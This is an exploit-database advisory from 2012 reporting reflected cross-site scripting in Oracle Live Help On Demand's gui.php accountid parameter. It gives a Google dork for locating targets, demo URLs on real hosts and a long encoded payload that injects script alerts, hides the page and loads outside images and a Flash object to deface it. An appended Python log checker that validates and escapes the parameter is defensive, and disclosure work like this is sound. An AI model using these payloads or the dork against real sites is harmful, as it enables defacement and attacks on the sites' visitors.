Oracle Live Help On Demand Webcare Cross Site Scripting



EKU-ID: 1567 CVE: OSVDB-ID:
Author: Sony Published: 2012-03-01 Verified: Verified


# Exploit Title: Oracle Live Help On Demand Webcare Cross Site Scripting
# Date: 29.02.2012
# Author: Sony
# Software Link: http://www.oracle.com/index.html
# Google Dorks: inurl:UI/gui.php
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC: http://st2tea.blogspot.com/2012/02/oracle-live-help-on-demand-webcare.html
..................................................................

Demo:

http://as00.estara.com/UI/gui.php?accountid=200106284055 [our xss is here]

http://as00.estara.com/UI/gui.php?accountid=200106284055&template=314323&calltype=webvoicepop&linkfile=%2FOneCC%2F200106284055%2F314323.js&referrer=Email&donotcache=1101055368&emaillink=1&guiid=440d09ef58217&timestamp=1234150034

or

https://t-603.estara.com/UI/gui.php?accountid=200106300249&template=823514&calltype=webvoicepop&linkfile=%2FOneCC%2F200106300249%2F823514.js&referrer=Email&donotcache=1444509745&emaillink=1&guiid=43834a54eac25&timestamp=1321973587



http://as00.estara.com/UI/gui.php?accountid=200106284055%22%22%3E%3Cscript%3Ealert%28%22..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:Salut!%22%29%3C/script%3E%3Cscript%3Ealert%28%22Admin:Hi%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:Uhh%20Ahh%20Yeah%22%29%3C/script%3E%3Cscript%3Ealert%28%22Admin:?%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:it%27s%20Song..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Admin:What%20Song?%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:Uhh%20Ahh%20Yeah%20by%20Dan%20Balan%22%29%3C/script%3E%3Cscript%3Ealert%28%22Admin:Oh,cool..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:p.s.%20I%20found%20xss%20on%20the%20oracle..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Admin:Don%27t%20care,%20i%20like%20this%20song..Uhh%20Ahh%20Yeah!%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:Yeah..%22%29%3C/script%3E%3Cstyle%3Ebody{visibility:hidden;}%20html{background-image:url%28%27http://www.hampton.gov/youth/images/white_background.png%27%29;}%3C/style%3E%3Cdiv%20style=%22position:%20absolute;center:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20black;%20font-size:%2040px;%22%3E%3Cimg%20src=%22http://4.bp.blogspot.com/_iHaUzis1v4c/TK_GUArAtqI/AAAAAAAANeU/6vCNrSFQu2E/s640/Ascii_Dance.gif%22%20style=%22height:%20350px;%20width:%20576px;%22%3E%20%3Cobject%20data=http://htmlka.com/wp-content/uploads/2009/06/webplayer.swf%20type=%22application/x-shockwave-flash%22%20width=%22240%22%20height=%2264%22%3E%3Cparam%20name=%22movie%22%20value=http://htmlka.com/wp-content/uploads/2009/06/webplayer.swf%3E%3Cparam%20name=%22menu%22%20value=%22false%22%3E%20%3Cparam%20name=%22scale%22%20value=%22noscale%22%3E%3Cparam%20name=%22flashvars%22%20value=%22src=/img/uploadimg/20120301/1708350.JPG

Video:

http://www.youtube.com/watch?v=og_Ev7glz_g
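
A defensive check for the accountid parameter shown in the demo above, as an added example that is not part of the original advisory or of the vendor's code. It assumes accountid is digits only (inferred from the demo URLs), flags /UI/gui.php requests in an access log that break that rule, and HTML-encodes the value for a double-quoted attribute; the log lines are constructed and the hidden-input markup is hypothetical.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: valid account ids are short, digits-only strings (as in the demo URLs).
ACCOUNT_ID_RE = re.compile(r"[0-9]{1,20}")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[0-9.]+"')

def check_accountid(url):
    """Return (ok, decoded_value) for the accountid parameter of a request URL."""
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get("accountid", [])
    if len(values) != 1:          # missing or repeated parameter: reject
        return False, None
    value = values[0]             # parse_qs has already percent-decoded it
    return bool(ACCOUNT_ID_RE.fullmatch(value)), value

def render_attribute(value):
    """Second layer: encode for a double-quoted HTML attribute (hypothetical markup)."""
    return '<input type="hidden" name="accountid" value="%s">' % html.escape(value, quote=True)

def flag_requests(log_lines):
    """Return request targets for /UI/gui.php whose accountid fails validation."""
    flagged = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group(1)
        if urlsplit(target).path != "/UI/gui.php":
            continue
        ok, _ = check_accountid(target)
        if not ok:
            flagged.append(target)
    return flagged

# Constructed access-log lines (combined log format), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Mar/2012:10:00:00 +0000] "GET /UI/gui.php?accountid=200106284055&template=314323 HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Mar/2012:10:00:05 +0000] "GET /UI/gui.php?accountid=200106284055%22%22%3E%3Cscript%3Ealert%281%29%3C/script%3E HTTP/1.1" 200 512',
    '192.0.2.12 - - [01/Mar/2012:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for target in flag_requests(SAMPLE_LOG):
        print("accountid failed validation:", target)
```

Validation rejects the request before anything is reflected; the output encoding is the fallback for any code path that still echoes the value.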